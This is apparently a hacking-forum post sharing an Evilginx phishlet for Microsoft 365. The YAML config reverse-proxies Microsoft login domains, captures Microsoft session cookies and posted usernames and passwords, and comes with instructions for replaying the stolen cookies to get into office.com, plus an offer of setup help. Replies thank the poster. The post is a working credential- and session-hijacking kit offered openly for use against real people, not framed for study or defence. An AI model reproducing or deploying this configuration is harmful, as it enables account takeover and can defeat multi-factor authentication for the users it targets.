Office Phishlet Made By Kuba

[aokay]

Evilginx Office phishlet made by kuba the creator of evilginx 

 

This is a working evilginx phishing phishlet that can capture cookies

 

 

# NOTE: In order to access office.com with the captured session cookies, first open live.com and after that office.com and click "Sign in" button.
name: "Microsoft 365 Personal"
min_ver: '3.2.0'
proxy_hosts:
  - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
  - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: true, is_landing: false}
  - {phish_sub: 'aadcdn', orig_sub: 'aadcdn', domain: 'msftauth.net', session: false, is_landing: false}
  - {phish_sub: 'sso', orig_sub: 'login', domain: 'live.com', session: true, is_landing: false}
auth_tokens:
  - domain: '.live.com'
    keys: ['WLSSC']
    type: 'cookie'
  - domain: 'login.live.com'
    keys: ['__Host-MSAAUTHP']
    type: 'cookie'
  - domain: 'www.office.com'
    keys: ['OhpAuth', 'OhpToken']
    type: 'cookie'
credentials:
  username:
    key: 'login'
    search: '(.*)'
    type: 'post'
  password:
    key: 'passwd'
    search: '(.*)'
    type: 'post'
login:
  domain: 'login.microsoftonline.com'
  path: '/'

 

 

 

Enjoy ya lucky mfs 

 

if you need help setting up evilginx dm me 

Edited by aokay, 05 September 2024 - 02:04 AM.

This leak has not been classified yet. Please be careful when downloading.

[someguyagain]

Nice stuff

[aokay]

Nice stuff

enjoy

[Sinalle]

Thank  you for sharing